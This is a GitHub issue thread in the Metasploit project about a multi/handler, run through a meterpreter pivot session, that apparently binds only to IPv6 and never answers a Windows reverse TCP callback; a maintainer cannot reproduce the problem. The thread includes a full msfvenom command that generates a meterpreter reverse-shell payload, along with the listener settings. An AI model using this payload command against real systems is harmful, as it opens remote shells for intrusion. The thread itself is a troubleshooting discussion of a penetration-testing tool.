### ISSUE TITLE
Handler via meterpreter session will not answer a reverse tcp connection

### ISSUE THREAD

**Issue by bradleman** [rapid7/metasploit-framework#14346]
I'm having trouble getting a meterpreter session to answer a windows reverse tcp shell . I can see the payload calling back to the host of the meterpreter session in wireshark, but the sessions never answers the payload calling back.

It appears the listener is only listening on ipv6 port and not the ipv4 port specified in the multi/handler.

metasploit v6.0.14-dev 

Payload -
```msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.11.10 LPORT=27 EXITFUNC=process -f py -a x86 –platform windows -b '\x00\x0a\x0d\xff'```

sent to victim 10.10.11.15 successfully and 10.10.11.15 tries to connect back 10 10.10.11.10 as seen in wireshark.

listener - 
```
Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.11.10      yes       The listen address (an interface may be specified)
   LPORT     27               yes       The listen port

[*] Started reverse TCP handler on 10.10.11.10:27 via the meterpreter on session 3
```
[Meterpreter Issue.pdf](https://github.com/rapid7/metasploit-framework/files/5489909/Meterpreter.Issue.pdf)

Thanks,
Brad

**Comment by bradleman** [comment]
Setting ReverseListenerBindAddress to 10.10.11.10 does not help.
Setting port to any other number does not help.
Still binds to ipv6 ->>  tcp6       0      0 :::8080

**Comment by smcintyre-r7** [comment]
I can't reproduce this, and it looks correct to me like it should be working. From the wireshark capture output it looks like Metasploit is closing the connection without sending the stage. 

I tested setting up the pivot both using an explicit `ReverseListenerComm` and a default route to put everything through my test session. Which of these are you using?

**Comment by bradleman** [comment]
I have a route added via the session but did not set ReverseListenerComm that I remember.

**Comment by bradleman** [comment]
Is there something I can do to help with this? It still only binds to IPV6 port and NOT ipv4 port.

**Comment by smcintyre-r7** [comment]
Since I can't reproduce this, I, unfortunately, can't offer any advice. You can try to provide additional detail including all of your framework's console output, and the framework logs. That would be a good start at helping me identify the difference in our setups.
